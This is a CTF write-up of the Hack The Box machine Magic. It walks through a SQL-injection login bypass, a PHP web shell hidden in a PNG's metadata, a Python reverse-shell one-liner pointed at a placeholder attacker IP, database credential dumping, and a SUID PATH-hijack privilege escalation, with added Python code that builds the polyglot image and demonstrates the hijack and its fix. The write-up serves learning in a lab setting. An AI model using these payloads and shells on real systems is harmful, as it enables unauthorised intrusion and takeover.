This CTF Learn Series will collect the tips and tricks I learned during CTFs.
So, that being said, today I pwned my first Hack The Box machine - Magic!
Thanks to Fahmi's Magic Walkthrough!
I was presented with a web server with two ports in use. Recon on the website turned up a login panel, and I bypassed the login with a simple SQL injection.
An image upload interface greeted me, and it accepted png, jpg and gif formats ONLY. My first thought was to upload a php-reverse-shell, but no: it rejected anything with a .php extension, and even renaming the shell to .php.png did not get it through. Bad luck! This was the time for me to learn my first trick
- exiftool lets us view the metadata of an image, and it can alter that metadata as well.
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' image.png
This command writes our PHP snippet into the Comment field of the image. Note the double quotes around cmd: the whole snippet is passed to exiftool inside single quotes, so single quotes around cmd would end the shell's quoting early. The pixel data is untouched, so the file is still a genuine image and passes the upload checks, but uploaded under a double extension such as image.php.png the server executes the embedded PHP.
As we used $_GET, the command is supplied through the cmd parameter in the URL:
...image.php.png?cmd=<any shell command> will run the shell command and show its output in the browser.
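As an added worked example (not from the original post or from Fahmi's walkthrough), here is what that exiftool command does at the byte level, written in Python: it builds a small valid PNG, inserts a text chunk keyed Comment carrying the same PHP payload (the kind of chunk exiftool -Comment= writes into a PNG), and then checks that the result still starts with the PNG signature and carries an allowed extension. The filename image.php.png, the extension whitelist and the two naive checks in passes_naive_upload_checks are assumptions standing in for the box's upload handler, not its actual code.

```python
import struct
import zlib
from typing import Iterator, Optional, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"

# The payload from the exiftool command above (double quotes around cmd so the
# snippet survives the shell's single-quoted argument unchanged).
PAYLOAD = '<?php echo "<pre>"; system($_GET["cmd"]); ?>'

# Assumed whitelist of the box's upload form: png, jpg and gif only.
ALLOWED_EXT = (".png", ".jpg", ".jpeg", ".gif")


def chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC-32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """Constructed sample input: a valid 1x1 black truecolour PNG (IHDR, IDAT, IEND)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, depth, colour type, ...
    scanline = b"\x00" + b"\x00\x00\x00"                  # filter byte + one RGB pixel
    return (PNG_SIG + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(scanline)) + chunk(b"IEND", b""))


def parse_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Walk the chunk list, verifying the signature and every CRC along the way."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in chunk {ctype!r}")
        yield ctype, payload
        pos += 12 + length


def add_comment(png: bytes, comment: str) -> bytes:
    """Insert a tEXt chunk with keyword 'Comment' before IEND, the chunk that
    `exiftool -Comment=...` writes for a PNG. Pixel data is untouched, so the
    file stays a valid image."""
    out = PNG_SIG
    for ctype, payload in parse_chunks(png):
        if ctype == b"IEND":
            out += chunk(b"tEXt", b"Comment\x00" + comment.encode("latin-1"))
        out += chunk(ctype, payload)
    return out


def get_comment(png: bytes) -> Optional[str]:
    """Read the Comment text back (what `exiftool image.png` would show)."""
    for ctype, payload in parse_chunks(png):
        if ctype == b"tEXt":
            key, _, value = payload.partition(b"\x00")
            if key == b"Comment":
                return value.decode("latin-1")
    return None


def passes_naive_upload_checks(filename: str, data: bytes) -> bool:
    """Assumed filter: extension whitelist plus a magic-byte check. Both are
    satisfied by a real PNG whose payload lives only in metadata."""
    return filename.lower().endswith(ALLOWED_EXT) and data[:8] == PNG_SIG


def build_polyglot(filename: str = "image.php.png") -> Tuple[str, bytes]:
    """Produce the upload: a genuine PNG carrying the PHP snippet in its Comment."""
    return filename, add_comment(minimal_png(), PAYLOAD)


if __name__ == "__main__":
    name, data = build_polyglot()
    with open(name, "wb") as fh:
        fh.write(data)
    print(f"wrote {name} ({len(data)} bytes); Comment = {get_comment(data)!r}")
```

The point the example makes is that the payload never touches the pixel data: a filter that checks only the extension and the magic bytes cannot tell this file from any other PNG, and a server that later decides by filename that it is PHP will happily run the Comment text.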
Checked whether python was available; it was not, but python3 was!
So I used the python3 one-liner reverse shell below. It has to be URL-encoded (spaces, quotes and parentheses included) when it is passed through the
cmd parameter, and before sending it I started a listener on my machine:
nc -nlvp 1234
Python One Liner Reverse Shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
A bit of recon as
www-data turned up the credentials of the MySQL database; with them, mysqldump gave me a dump containing a user's credentials.
Next step was privilege escalation to root!
Ran linpeas.sh, which listed some SUID binaries; the one that looked interesting was
sysinfo, which was linked to
Time for the next lesson!
After some more recon, we knew that
sysinfo, when run, executed a program called
lshw, and that it called it by name rather than by full path, so the lookup went through the PATH variable. If we could get our own lshw to run in its place, with the root privileges of
sysinfo, we could possibly achieve our task.
So we created a new file at
/tmp/cardinal/lshw, put the python reverse shell in it and made it executable.
What we have to do now is put that directory at the front of the PATH variable, so that sysinfo finds our lshw before the real one.
Then, with a listener running in our own terminal, in the user's terminal we executed
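The whole PATH hijack, as an added example in Python that is not part of the original post or of the box: it plants a stand-in lshw in a temporary directory, prepends that directory to PATH (the same effect as export PATH=/tmp/cardinal:$PATH on the box), and runs a stand-in for sysinfo that calls lshw by bare name through a shell. A hardened variant resets PATH to a fixed trusted value before the call, which is the defence a SUID program needs (calling the program by absolute path works too). victim_sysinfo and hardened_sysinfo are hypothetical models of the binary, not its code; the fake lshw only echoes a marker instead of spawning a reverse shell, and since this runs with ordinary privileges the marker names the current user rather than root.

```python
import os
import shutil
import subprocess
import tempfile

# Stand-in for the payload dropped at /tmp/cardinal/lshw. On the box this would be
# the python3 reverse shell; here it only prints a marker so the hijack is visible.
FAKE_LSHW = "#!/bin/sh\necho \"HIJACKED as $(id -un)\"\n"

# Fixed PATH a privileged program should set itself instead of trusting its caller's.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def plant_fake_binary(directory: str, name: str = "lshw", body: str = FAKE_LSHW) -> str:
    """Write an executable script named like the program the SUID binary calls."""
    path = os.path.join(directory, name)
    with open(path, "w") as fh:
        fh.write(body)
    os.chmod(path, 0o755)
    return path


def hijack_path(directory: str, base_env=None) -> dict:
    """Equivalent of `export PATH=/tmp/cardinal:$PATH`: our directory is searched first."""
    env = dict(base_env if base_env is not None else os.environ)
    env["PATH"] = directory + os.pathsep + env.get("PATH", "")
    return env


def victim_sysinfo(env: dict) -> str:
    """Hypothetical model of sysinfo: runs `lshw` by bare name via the shell,
    so whichever lshw appears first in PATH is the one that executes."""
    proc = subprocess.run("lshw 2>/dev/null", shell=True, env=env,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def hardened_sysinfo(env: dict) -> str:
    """Same call, but PATH is reset to a fixed trusted value first, so a
    caller-controlled PATH cannot redirect the lookup."""
    safe_env = dict(env)
    safe_env["PATH"] = TRUSTED_PATH
    return victim_sysinfo(safe_env)


def demo() -> tuple:
    """Plant the fake lshw, hijack PATH, and return (vulnerable output, hardened output)."""
    workdir = tempfile.mkdtemp(prefix="cardinal-")
    try:
        plant_fake_binary(workdir)
        env = hijack_path(workdir)
        return victim_sysinfo(env), hardened_sysinfo(env)
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    hijacked, hardened = demo()
    print("vulnerable sysinfo ran:", hijacked or "(the real lshw, or nothing)")
    print("hardened sysinfo ran:  ", hardened or "(the real lshw, or nothing)")
```

Run as a normal user the vulnerable model prints the marker with your own username; on the box the same lookup happens inside a SUID root process, which is why the planted script runs as root. The hardened model never reaches the planted file, whether or not a real lshw is installed.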